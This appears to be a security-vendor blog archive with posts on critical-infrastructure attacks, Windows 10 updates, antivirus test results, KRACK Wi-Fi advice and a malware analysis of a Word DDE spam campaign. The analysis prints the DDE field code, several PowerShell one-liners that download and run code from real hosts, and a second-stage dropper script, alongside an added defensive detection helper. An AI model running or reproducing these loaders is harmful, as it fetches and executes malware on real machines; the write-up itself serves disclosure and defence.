Category Archives: Antivirus Vendors

US warns of ongoing attacks on energy firms and critical infrastructure

The US Department of Homeland Security and FBI have warned that hackers are actively targeting government departments, and firms working in the energy, nuclear, water, aviation, and critical manufacturing sectors.

The post US warns of ongoing attacks on energy firms and critical infrastructure appeared first on WeLiveSecurity

Turning up the heat on smart thermostats

Smart thermostats are near the top of many shopping lists of ‘must have’ devices for the connected home. After all, who wouldn’t want the financial and energy efficiency advantages of a programmable device without all the installation headaches? But have you considered the security and privacy issues that they might involve? Smart goes mainstream Smart […]

The post Turning up the heat on smart thermostats appeared first on Avira Blog.

A New Attack Takes Advantage of an Exploit in Word

On October 10th, researchers at the Chinese firm Qihoo 360 published an article warning of a zero-day exploit (CVE-2017-11826) affecting Office that was already being actively exploited by attackers.

In the last few hours, we have detected a spam campaign targeting companies and making use of this exploit. This is a very dangerous attack since commands can be executed in Word with no OLE objects or macros needed. All our clients are proactively protected and updating will not be necessary thanks to Adaptive Defense 360.

Behavior

The email comes with an attached document. When opening the Word document, the first thing we see is the following message:

If we click “Yes”, the following message appears:

Next, the following message appears:

The document (sample 0910541C2AC975A49A28D7A939E48CD3) contains two pages. The first is blank, the second contains just a short message in Russian: “Error! Section unspecified.”

If we right-click the text, we can see that there is an associated field code:

If we click “Edit field”, we find the command used to exploit the vulnerability and allow the code to execute:

DDE C:\Windows\System32\cmd.exe “/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘hxxp://arkberg-design.fi/KJHDhbje71’);powershell -e $e “

Here is a screen shot of the process tree that is generated if the exploit is executed properly:

Exploit CVE-2017-11826 – Download and execution of malware from the Word document

Here are some of the files used in this campaign:


Commands to be Executed

Depending on which sample is analyzed, the download URL changes while the command itself stays essentially the same.

Sample 0910541C2AC975A49A28D7A939E48CD3

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://arkberg-design.fi/KJHDhbje71’)~powershell -e $e

Sample 19CD38411C58F5441969E039204C3007

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://ryanbaptistchurch.com/KJHDhbje71’)~powershell -e $e

Sample 96284109C58728ED0B7E4A1229825448

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://vithos.de/hjergf76’)~powershell -e $e

Sample 1CB9A32AF5B30AA26D6198C8B5C46168

powershell  -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString(‘http://alexandradickman.com/KJHDhbje71’)~powershell -e $e
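A defender-side triage helper for field codes like the one shown above, added here as an example and not part of the Panda post: it flags DDE/DDEAUTO fields that start a shell, hide their window or fetch a URL, and pulls out the download URL so the per-sample command variants can all be processed the same way. The names analyze_field_code and SAMPLE_FIELD are my own, and the regex-based parsing is an approximation rather than Word's field parser.

```python
import re

# Word field instructions that ask another application to run (DDEAUTO fires on open).
DDE_FIELDS = ("DDEAUTO", "DDE")
# PowerShell switches used in this campaign to stay quiet or pass a downloaded script.
PS_FLAGS = {"-nop", "-noprofile", "-w", "-windowstyle", "hidden", "-noni",
            "-noninteractive", "-sta", "-e", "-enc", "-encodedcommand"}
# Accepts live (http) and defanged (hxxp) URLs so IoC write-ups can be fed in as-is.
URL_RE = re.compile(r"h[xt]{2}ps?://[^\s'\"()]+", re.IGNORECASE)
SHELL_RE = re.compile(r"\b(cmd|powershell|mshta|wscript|cscript)(\.exe)?\b", re.IGNORECASE)

# The field code shown in the post above (URL defanged as it appears there).
SAMPLE_FIELD = ('DDE C:\\Windows\\System32\\cmd.exe "/k powershell -NoP -sta -NonI -w hidden '
                "$e=(New-Object System.Net.WebClient).DownloadString('hxxp://arkberg-design.fi/KJHDhbje71');"
                'powershell -e $e "')


def analyze_field_code(field: str) -> dict:
    """Inspect one Word field instruction and report whether it is a DDE launcher.

    Returns is_dde, the launched program, suspicious PowerShell flags, URLs and an
    overall 'suspicious' verdict (a DDE field that starts a shell, hides itself or fetches a URL).
    """
    # Word and blog extractions often swap in curly quotes; normalise before parsing.
    text = field.translate(str.maketrans({"\u201c": '"', "\u201d": '"', "\u2018": "'", "\u2019": "'"}))
    tokens = text.strip().split()
    result = {"is_dde": False, "launched": None, "flags": [], "urls": [], "suspicious": False}
    if not tokens or tokens[0].upper() not in DDE_FIELDS:
        return result
    result["is_dde"] = True
    # The token after DDE/DDEAUTO is the "application" Word will start.
    result["launched"] = tokens[1].strip('"') if len(tokens) > 1 else None
    lowered = text.lower()
    result["flags"] = sorted(f for f in PS_FLAGS
                             if re.search(r"(?<![\w-])" + re.escape(f) + r"(?![\w-])", lowered))
    result["urls"] = URL_RE.findall(text)
    result["suspicious"] = bool(SHELL_RE.search(text) or result["urls"] or result["flags"])
    return result


if __name__ == "__main__":
    # Constructed benign field for comparison: a plain DATE field from an ordinary document.
    for name, field in (("campaign sample", SAMPLE_FIELD), ("benign date field", 'DATE \\@ "dd/MM/yyyy"')):
        verdict = analyze_field_code(field)
        print(f"{name}: suspicious={verdict['suspicious']} launched={verdict['launched']} urls={verdict['urls']}")
```

On real documents the field instruction strings still have to be extracted first (for example from the document's text stream); the function only inspects those strings.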

The following powershell script is downloaded and executed:

$urls = "hxxp://shamanic-extracts.biz/eurgf837or","hxxp://centralbaptistchurchnj.org/eurgf837or","","hxxp://conxibit.com/eurgf837or"

# Try each hosting URL in turn; the first successful download is launched and the loop stops.
foreach($url in $urls){
    Try
    {
        Write-Host $url
        $fp = "$env:temprekakva32.exe"
        Write-Host $fp
        $wc = New-Object System.Net.WebClient
        $wc.DownloadFile($url, $fp)
        Start-Process $fp
        break
    }
    Catch
    {
        # A failed download (dead host, empty URL) just moves on to the next entry.
        Write-Host $_.Exception.Message
    }
}

From this URL:

hxxp://shamanic-extracts.biz/eurgf837or

a Trojan is downloaded (4F03E360BE488A3811D40C113292BC01).

MD5s of the Word documents:

0910541C2AC975A49A28D7A939E48CD3
19CD38411C58F5441969E039204C3007
96284109C58728ED0B7E4A1229825448
1CB9A32AF5B30AA26D6198C8B5C46168

The post A New Attack Takes Advantage of an Exploit in Word appeared first on Panda Security Mediacenter.

Fall Creators, the new Windows 10 upgrade

Fluent Design is finally arriving on Windows 10

Earlier this year, Microsoft unveiled its Fluent Design System, a new design language for the Windows 10 interface, announcing at the same time a number of changes to the company’s software in the future. This week, the Redmond company has finally rolled out the first phase of the new system, as part of the Windows 10 Fall Creators Update.

The launch has been accompanied by a video showcasing some of the new design changes to Windows 10, although it doesn’t reveal much information about any of the future additions. The video offers a sneak peek of various components and apps that have been redesigned with new visual effects that aim to give Windows 10 more texture, depth and visual responsiveness to inputs. The new Fluent Design will roll out gradually, starting with its own apps and elements like the Start menu, Action Center and notifications. Microsoft has stated that these are just the first steps of the project and that new features and capabilities will be introduced in the future.

Fluent Design System is designed to be the successor to Microsoft’s Metro design and will appear across apps and services on Windows, iOS and Android. Microsoft is focusing on light, depth, motion and scale, with animations that add a sense of fluidity during interactions, in contrast to the minimalistic, tile-based interface of the past. Besides incorporating the first phase of Fluent Design System, Windows 10 Fall Creators Update also introduces OneDrive Files On-Demand, a new feature that allows users to access their documents without having to download them. Microsoft Edge has also been improved, incorporating a new tool to manage Favorites and the ability to import settings from Chrome. Finally, the operating system includes a new GPU monitoring option in the Task Manager.

More new features yet to come

We’re expecting to see even more changes in the next Windows 10 update, which is currently in development under the codename Redstone 4. Microsoft has started testing the initial features for this version, which is scheduled for March 2018. The main addition so far is a new Cortana Collections feature, which will see and remember users’ browsing habits. As Microsoft finishes its functionality tests, new information will be unveiled about the new improvements, in addition to a new Timeline feature that will let users resume sessions and apps on Windows PCs, iOS and Android devices more easily.

This update does not affect the operation of the Windows 10-compatible antivirus solutions available on the market, including the entire Panda Antivirus product line. So, installing a professional antivirus tool is not only possible, but highly recommended. In this context, the latest version of Panda’s antivirus solutions has the added guarantee of having achieved one of the best detection rates in the latest edition of the AV-Comparatives professional antivirus comparative review.

The post Fall Creators, the new Windows 10 upgrade appeared first on Panda Security Mediacenter.

More stars for Avira from AV-Comparatives

Avira won additional stars from AV-Comparatives in the independent agency’s latest Performance Test and Malware Protection Test, and also had a top-level performance in the monthly Real World Protection Test. Avira Antivirus Pro received the AV-Comparatives highest Advanced+ *** rating in the latest Performance Test, placing in the top category of AV products with the least […]

The post More stars for Avira from AV-Comparatives appeared first on Avira Blog.

KRACK attack: beware of public Wi-Fi

Why can KRACK be so dangerous?

Cybersecurity experts have discovered a critical weakness in Wi-Fi connections that could make your private information vulnerable to cyber criminals. The threat is called KRACK (key reinstallation attacks) and could allow someone to steal information sent over your private Wi-Fi or any open connections you might access in public places like coffee shops.

KRACK is dangerous because it affects so many people. Most people who connect wirelessly to the internet through Wi-Fi on their phone, tablet, laptop, etc. do so using the WPA2 (Wi-Fi Protected Access) protocol, which helps keep your information safe by encrypting it, turning it into a secret code. Now KRACK has made it much less protected, because thieves may be able to decipher the code that protects your information and read it whenever they want.

Cyber criminals can also use KRACK to modify wirelessly transmitted data to and from the websites you visit. You might think you’re going to your bank’s website, when in reality you’re at a fake phishing site made to look like it. You unknowingly enter your username and password, and the thieves now can record that information.

How do I protect myself?

Update your operating system

Update your OS ASAP. In the meantime, Apple, Google and others are presumably working to roll out a patch to protect against KRACK.

Microsoft just announced it included a patch in an October 10th security update. For Windows customers who have their “Windows Update enabled and applied the security updates,” they’re automatically protected from the KRACK threat, according to Windows Central.

However, don’t assume you’re protected. Even if you’re a Windows user, double check you have the latest security updates.

Use Wi-Fi networks only when necessary

Until you’ve installed the KRACK security patch, avoid using Wi-Fi connections, both at home and especially at public hotspots. Your home Wi-Fi connection is slightly more secure only because cyber thieves need to be relatively close to your physical location to steal your data. But that doesn’t mean you’re safe at home or in public.

If you absolutely need to use a wireless network, make sure you’re not transmitting confidential info like your SSN, credit card number, or bank information.

If possible, hardwire your wirelessly connected devices back to your modem/router. Cyber criminals can’t steal signals out of the air if they’re not there, so find that yellow ethernet cable you stashed somewhere in a drawer and use it to connect to as many devices as possible.

Update your wireless router’s firmware

Your router’s firmware helps it work correctly with your devices, so keep it up-to-date. When the security patch rolls out, you don’t want any issues with conflicting or unsupported firmware versions. Updating your router’s firmware is a relatively painless process.

Configure your router so only your approved devices can connect to the network. Each of your devices has a media access control (MAC) address that uniquely identifies it to work with the network. Configure your router to only allow listed devices. The process may differ depending on your router brand.

Hide your Wi-Fi network so even those close enough to detect your signal won’t see it listed. Hiding your network won’t stop dedicated hackers from eventually finding it, but it will create another step they must go through, which is your goal until the patch comes through. It’s likely it will take developers some time to adequately address KRACK, so stay vigilant.

Avoid unencrypted websites

Encrypted websites have HTTPS at the beginning of their URLs. The information you send to and receive from them is secure. Websites that only use HTTP are NOT encrypted. So use HTTPS sites as much as possible. HTTPS Everywhere is a browser plugin that automatically switches thousands of sites from HTTP to HTTPS.

Get some good cybersecurity software

Having cybersecurity software always helps mitigate risk. For critical attacks like KRACK, it’s especially important to add as many layers of protection as possible.

What information can be stolen?

Anything you can send wirelessly over the internet. So, pretty much everything. Passwords, credit card numbers, voice messages, pictures, texts, and the like. Again, this goes for both public and private wireless networks, so your info could be stolen while you’re signed in to the library’s Wi-Fi network or when you’re texting someone from your living room. Deactivate your cell phone’s Wi-Fi connection until you’ve gotten the fix from your OS developer or stay on 3G network for data transfer.

Can it affect my devices?

Strictly speaking, no. Neither your wirelessly connected devices nor your router are being directly targeted. Unlike ransomware, thieves aren’t KRACKing into your device and threatening to destroy your information. It’s more of an elaborate heist job than a hostage situation. They want to decrypt the protocol, to eavesdrop on what your devices are saying. They’re interested in the info not who is talking. More importantly, thieves want to go unnoticed.

How did the KRACK vulnerability happen?

Your cell phone and Wi-Fi device (i.e. modem) need to “talk” to each other to decide how to work together and transmit data. The language they use is called a protocol, or system of rules. The protocol is encrypted for privacy. It’s like two people switching to a different language to discuss something privately. If you don’t know the language, you’re in the dark. That’s how your information is kept private when sent over Wi-Fi.

But the KRACK attack gives cyber criminals an opening to decrypt the information sent. It would be like someone bringing an interpreter to the couple’s private discussion. They now can overhear everything that’s being said.

Can I tell if someone’s stealing my info over Wi-Fi?

As of yet, there’s no way to know if someone is KRACKing your wireless access. That’s why it’s especially important to keep an eye out for an update, and to follow the safety recommendations above.

The post KRACK attack: beware of public Wi-Fi appeared first on Panda Security Mediacenter.
